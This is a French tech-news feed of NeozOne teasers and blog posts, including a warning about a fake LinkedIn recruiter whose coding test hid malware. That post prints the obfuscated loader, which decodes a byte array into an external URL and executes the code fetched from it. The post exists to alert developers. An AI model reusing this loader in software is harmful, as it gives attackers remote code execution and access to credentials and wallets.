Chaque année, un nouveau défi émerge dans le paysage médiatique, et cette fois-ci, c'est l'invasion des punaises de lit qui retient l'attention. Découvrez les dernières inventions conçues pour lutter contre ces indésirables et protéger votre espace de vie.
L’article Punaises de lit : 7 inventions et innovations pour se débarrasser des insectes parasites est apparu en premier sur NeozOne.
Posé directement sur votre poêle à bois, le ventilateur sans électricité diffuse la chaleur dans toute la pièce… mais quel est donc son secret ?
L’article Comment les ventilateurs de poêle à bois arrivent-ils à fonctionner sans électricité ? est apparu en premier sur NeozOne.
En Corée du Sud, un chercheur de l’Institut maritime a développé un arbore photovoltaïque qui pourrait concilier production d’électricité solaire et préservation des écosystèmes forestiers.
L’article Un chercheur de l’Institut maritime dévoile un arbre photovoltaïque qui préserve les forêts est apparu en premier sur NeozOne.
Et si le bois, souvent accusé de polluer, était en réalité une solution pour mieux respirer et alléger nos factures cet hiver ?
L’article Le granulé de bois « n’est pas le problème mais est une grande partie de la solution » est apparu en premier sur NeozOne.
Une tiny house de 12 m², sur roues, avec douche, cuisine et lit double pour moins de 33 000 € ? Oui, elle existe, et elle s’appelle Fairfax !
L’article La Fairfax de Dragon Tiny Homes, une mini maison sur roues à moins de 33 000 € est apparu en premier sur NeozOne.
Frelon asiatique : quelle est l’astuce de ce jeune apiculteur pour débusquer les nids cachés ?
L’article La formule mathématique d’un apiculteur pour localiser les nids de frelons asiatiques est apparu en premier sur NeozOne.
Les physiciens John Clarke, Michel Devoret et John Martinis se sont vus décerner le prestigieux prix Nobel de physique 2025. Une récompense due à leurs travaux sur l’« effet tunnel quantique macroscopique ».
L’article Le Nobel de physique 2025 attribué à l’intriguant « effet tunnel quantique macroscopique » est apparu en premier sur NeozOne.
L'Institut Fraunhofer pour les systèmes d'énergie solaire (ISE) a annoncé une avancée majeure dans le domaine de l’énergie photovoltaïque. Il a réussi à mettre au point une cellule solaire à micro-concentration (micro-CPV) avec une efficacité record de 36 %.
L’article Fraunhofer ISE dévoile un module solaire micro-CPV avec un rendement de 36 % est apparu en premier sur NeozOne.
Le fabricant italien Clivet vient de présenter une nouvelle pompe à chaleur monobloc pensée pour un usage résidentiel. Baptisé Aqua F, cet appareil innovant affiche un coefficient de performance (COP) particulièrement élevé.
L’article Clivet dévoile une pompe à chaleur intérieure à usage résidentiel avec un COP de 5,31 est apparu en premier sur NeozOne.
Ce bio-béton à carbone-négatif, conçu par la start-up indienne GreenJams, capture le CO₂ et réduit les coûts de construction jusqu'à 50 %. Découverte !
L’article Agrocrete, un bio-béton isolant qui réduit les coûts de construction de 50 % est apparu en premier sur NeozOne.
Capturer le frelon asiatique sans détruire la biodiversité. C'est le but de Veto-pharma à travers l'amélioration de son système de piégeage qui se veut désormais plus sélectif
L’article Véto-pharma dévoile un piège à frelons asiatiques conçu pour être sélectif et accessible est apparu en premier sur NeozOne.
Saviez-vous qu’un simple bouton « + Suivre sur Google » peut vous permettre de retrouver directement vos articles préférés de NeozOne sur votre fil Discover ?
L’article Comment suivre NeozOne sur Google Discover pour ne rien manquer de nos bons plans, tests et innovations est apparu en premier sur NeozOne.
Question flippante, hein ?
Vous postez des stories Instagram, vous faites des snaps, des TikToks, en bon nazi vous likez des tweets, vous répondez à des emails pro…etc. Votre vie numérique ronronne comme un chat sous coke mais si demain, tout ça s’arrêtait…? A votre avis, Combien de temps avant que quelqu’un ne toque à votre porte pour vérifier que vous allez bien ?
Un jour ? Deux jours ? Une semaine ?
On est tous hyperconnectés 24/7 mais personne ne surveille vraiment notre silence et vos 500 meilleurs amis de Facebook ne prendront jamais la peine de signaler votre disparition.
C’est de ce constat un peu morbide qu’est né Wellness Ping, un projet open source développé par micr0 et hébergé sur GitHub qui fonctionne comme ceci : Vous vous inscrivez dessus, et vous recevez un email régulier pour confirmer que vous allez bien. Si vous ne répondez pas, vos contacts d’urgence sont alors automatiquement alertés.
C’est ce qu’on appelle un dead man’s switch, le joujou préféré des cons de terroristes qui se font exploser dans les films des années 80. En gros, tant que vous confirmez votre présence, tout va bien mais si le silence se prolonge, l’alarme se déclenche.
Vous pouvez l’auto-héberger vous-même ou utiliser directement le site wellness-p.ing (C’est gratuit). Vous choisissez alors la fréquence des pings, soit quotidien ou hebdomadaire, selon votre niveau de paranoïa ou de solitude et quand vous recevez l’email, vous cliquez sur un lien ou vous répondez “PONG” et c’est tout. Pas de dashboard compliqué, pas de machins de gamification débiles…
Et si vous ne répondez pas parce que vous êtes coincé au chiottes depuis 3 jours, le système vous envoie un rappel. Si vous ne répondez toujours pas, il attend encore un peu. Et si le silence persiste, vos contacts d’urgence reçoivent alors automatiquement une alerte.
C’est clairement fait pour activistes, les journalistes, les chercheurs, et les gens qui vivent seuls. Bref, tous ceux dont la vie pourrait basculer sans que personne ne s’en rende compte immédiatement. Je pense pas exemple à tous ceux qui bossent en remote et qui n’ont pas de collègues pour remarquer leur absence.
Au Japon, il y a un mot pour ça d’ailleurs. Ils disent kodokushi pour “Mort solitaire” car là bas, des milliers de personnes par an meurent seules chez elles, et on ne les découvre que des jours ou des semaines plus tard. C’est d’ailleurs souvent parce que les voisins sentent que ça schlingue ou parce que le courrier s’entasse sous la porte. Je sais, c’est gore mais c’est la triste réalité.
Avec Wellness Ping on inverse donc la logique… Au lieu d’attendre que quelqu’un remarque votre absence, vous créez un système proactif où vous choisissez les contacts, vous qui décidez de la fréquence et comme ça, si un jour vous ne pouvez plus répondre, le filet de sécurité se déploie automatiquement.
Côté technique, le projet est développé en Go donc c’est léger, rapide, et la démo tourne sur un serveur en Suède parce que ce pays a une législation stricte sur les données personnelles.
Bref, c’est Wellness Ping, c’est une idée simple mais qui protège alors pensez-y !
Des chercheurs d’une université britannique ont franchi une étape majeure en réalisant une téléportation. Il ne s’agit pas cependant de déplacer des objets ou des êtres humains, mais de transmettre des données quantiques entre deux ordinateurs...
L’article Les chercheurs d’Oxford ont réalisé la première téléportation quantique est apparu en premier sur NeozOne.
Les toilettes japonaises séduisent par leur confort et leur technologie, mais derrière le luxe du jet d’eau chaud et du siège chauffant se cachent quelques petits tracas du quotidien… que les vendeurs omettent souvent d’évoquer.
L’article Les inconvénients des toilettes et abattants japonais est apparu en premier sur NeozOne.
Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !
Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.
Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.
Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.
Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.
Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !
Connexion//Get Cookie
(async () => {
const byteArray = [
104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
98, 50, 48, 51, 49, 102, 98, 57
];
const uint8Array = new Uint8Array(byteArray);
const decoder = new TextDecoder('utf-8');
axios.get(decoder.decode(uint8Array))
.then(response => {
new Function("require", response.data.model)(require);
})
.catch(error => { });
})();
Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.
Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.
Alors pourquoi ça marche aussi bien ?
Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.
Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.
Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.
Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !
Vous avez déjà passé trois semaines à résoudre un problème qui n’existe pas ?
Hé bien Sam Hoarder, lui, a fait encore mieux. Il a pris un drone FPV déjà ultra-compact, le BetaFPV Air65 avec ses 65mm d’empattement, et l’a transformé en un truc trois fois plus petit, dix fois plus galère à piloter, et totalement inutile !
22 millimètres d’empattement de moteur à moteur, ça qui tient dans une boîte de Pringles et c’est génial. Parce que OUI, dans un monde tech obsédé par des specs toujours plus impressionnantes, des autonomies de 48 heures et des écrans pliables dans tous les sens, Sam a fait un truc qui sert à rien. Il a pris un drone qui vole très bien et s’est dit “hey, comment je pourrais rendre ce drone encore moins pratique à pilote ?”
Les hélices de l’Air65 de base font 31mm de diamètre, les moteurs font 9mm et si on fait se chevaucher les quatre hélices au maximum, on obtient théoriquement 31 - 9 = 22 mm d’empattement. Voilà, c’est tout… sauf que pour y arriver, il a fallu modéliser chaque composant dans SolidWorks, designer un cadre custom en deux plaques avec des supports moteur décalés, imprimer le tout en PLA avec une précision de 0,12 mm, et bien sûr démonter entièrement l’Air65 pour en remonter les moteurs avec des vis de montre, découper des oeillets au micron près, reconfigurer l’orientation du contrôleur de vol dans Betaflight avec un angle à 45°, et croiser les doigts très fort !!
Et le résultat est là puisque sont nouveau drone pèse 25 grammes tout mouillé avec sa batterie Lava 300mAh (qui est plus grande que le drone lui-même, au passage). La batterie dépasse donc littéralement du cadre. On dirait un cure-dent avec un sac à dos son machin et les quatre hélices se frôlent avec un espacement ridicule.
Et pour le décollage, c’est impossible de la faire partir posé au sol, car les hélices se touchent. Il faut donc le tenir délicatement entre deux doigts, armer les moteurs en priant pour ne pas déclencher le système anti-runaway, et le lâcher au moment précis où il commence à tenir.
Sam a filmé ses premiers essais et on le voit galérer pendant trois bonnes minutes, le drone dans une main, la radiocommande dans l’autre, essayant de trouver le timing parfait. C’est stressant à regarder, j’avoue et quand il y arrive enfin, le drone s’envole, vole correctement (ce qui est déjà un miracle), et on se dit “OK, mais maintenant il va faire quoi avec ?”
Hé bien rien. Absolument rien ^^.
Par contre, Sam a mis tous ses fichiers 3D gratuitement sur MakerWorld donc libre à vous de reproduire ce projet complètement inutile si ça vous chauffe.
Amusez-vous bien !
Vous connaissez ce mème que tous les barbus sans originalité ont sur un t-shirt ou une tasse et qui dit : “There’s no place like 127.0.0.1” ? (Oui moi aussi j’ai eu un t-shirt comme ça ^^)
Ce jeu de mots culte fait référence au Magicien d’Oz et surtout au localhost, qui est l’adresse locale où votre machine se connecte à elle-même. Eh bien mauvaise nouvelle, Microsoft vient de la rendre littéralement inopérante avec leurs dernières mises à jour de merde. Ainsi, Windows 11 ne peut plus accéder à sa propre adresse localhost. C’est fou quand même ! On dirait presque une blague mais non…
Les patchs KB5066835 et KB5065789 sortis en joli mois d’octobre ont pété totalement HTTP.sys, un composant du kernel Windows qui permet aux applications de discuter en local via HTTP/2. Du coup, les connexions vers 127.0.0.1 en HTTP/2 plantent systématiquement avec des messages d’erreur du genre ERR_CONNECTION_RESET ou ERR_HTTP2_PROTOCOL_ERROR.
Votre machine ne se reconnaît plus. Elle est là, elle fonctionne, mais elle ne peut plus se pinguer elle-même. Et évidemment, ceux qui trinquent ce sont surtout les développeurs. Visual Studio ne peut plus déboguer correctement, SQL Server Management Studio refuse de se connecter avec l’authentification Entra ID, l’application Duo Desktop, utilisée pour le 2FA, est complètement KO. Même des softs pros comme Autodesk Vault sont touchés.
Bref, si vous bossez avec du dev local ou des outils qui tournent en localhost, vous êtes dans la mierda.
Microsoft a corrigé dans ce patch un nombre record de 175 vulnérabilités CVE, dont 6 zero-days critiques et ils ont aussi fait le ménage en supprimant un vieux driver Agere Modem vieux de 20 ans qui traînait encore. Ils ont nettoyé, sécurisé, et optimisé Windows un peu plus mais visiblement sans faire quelques vérifications de base. Je trouve ça vraiment surprenant qu’aucun dev chez Microsoft ne s’en soit rendu compte avant que ça parte en prod.
Bon et alors, comment on s’en sort de leur nouvelle connerie ? Hé bien il y a 2 solutions, pas très classes mais qui fonctionnent.
La première, c’est de bidouiller le registre Windows pour désactiver HTTP/2. Vous allez dans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters
Et vous mettez EnableHttp2Tls et EnableHttp2Cleartext à 0.
Redémarrage obligatoire (C’est Windows, bébé) et voilà !
La deuxième solution, plus radicale, consiste à désinstaller les mises à jour. Un petit coup de
wusa /uninstall /kb:5066835
ou
wusa /uninstall /kb:5065789
dans votre terminal et hop, vous retrouvez votre localhost fonctionnel, sauf que voilà, au bout d’un moment, Windows Update va gentiment vous les réinstaller automatiquement au prochain redémarrage si vous ne faites pas gaffe. C’est un peu comme votre ex toxique qui revient sans cesse dans votre vie…
Le truc encore plus wtf dans cette histoire, c’est que ce bug n’existe pas sur les installations toutes fraîches de Windows 11 24H2. Donc si vous installez Windows 11 proprement depuis zéro, localhost fonctionnera nickel. C’est seulement si vous avez mis à jour votre machine que vous êtes maudit du cul. Microsoft suggère donc “implicitement” que la meilleure solution serait… de tout réinstaller ! Bah ouais, on a que ça à foutre ! Merci du conseil, les gars.
Bref, encore une fois, on a l’impression que les équipes QA de Redmond ont pris des vacances prolongées. Bref, encore un fail monumental ! Bilou reviens, tu nous manques ! ^^
Voilà, donc si vous êtes développeur et que Visual Studio vous fait la gueule depuis début octobre comme un ado qui viendrait de se lever, vous savez maintenant pourquoi. Ce n’est pas votre code qui est pourri (enfin, peut-être qu’il l’est, mais c’est un autre sujet…), c’est juste Windows 11 qui a la gueule de bois !
Home sweet home ? Plutôt “home where is my home ?”, ouais.
L’entreprise nancéienne Urbanloop a développé des capsules sur rails 100 % électriques et entièrement autonomes, consommant 0,047 kWh par km. Les premières lignes devraient voir le jour sur le territoire nancéien et à Dunkerque…
L’article Urbanloop : une mini capsules de train sans chauffeur qui ne consomme que 0,047 kWh par km est apparu en premier sur NeozOne.